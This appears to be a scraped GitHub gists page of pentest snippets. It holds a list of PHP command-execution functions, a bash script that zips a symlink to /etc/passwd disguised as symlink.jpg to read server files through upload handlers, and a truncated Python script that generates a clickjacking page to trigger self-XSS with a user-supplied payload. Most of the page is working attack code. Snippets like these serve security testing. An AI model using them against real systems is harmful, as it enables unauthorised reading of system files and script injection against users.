exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
Vishwaraj Bhattrai vishwaraj101
vishwaraj101
/ phpdangerousfuncs.md
Created
January 3, 2022 09:44
— forked from mccabe615/phpdangerousfuncs.md
Dangerous PHP Functions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "symlink.jpg created" | |
| ln -s /etc/passwd ./symlink.jpg | |
| echo "photos.zip with symlink created" | |
| zip --symlinks photos.zip ./symlink.jpg |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| print "Clickjack to Xss" | |
| vector=raw_input('xss vector--> ') #xss payload | |
| html=raw_input('Custom Iframe Code--> ') #custom iframe code | |
| fo=open('exploit.html','w') #creating html file | |
| source_code="""<html><body> | |
| <h1>Clickjack to exploit self xss </h1> | |
| <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div> | |
| """%(vector) |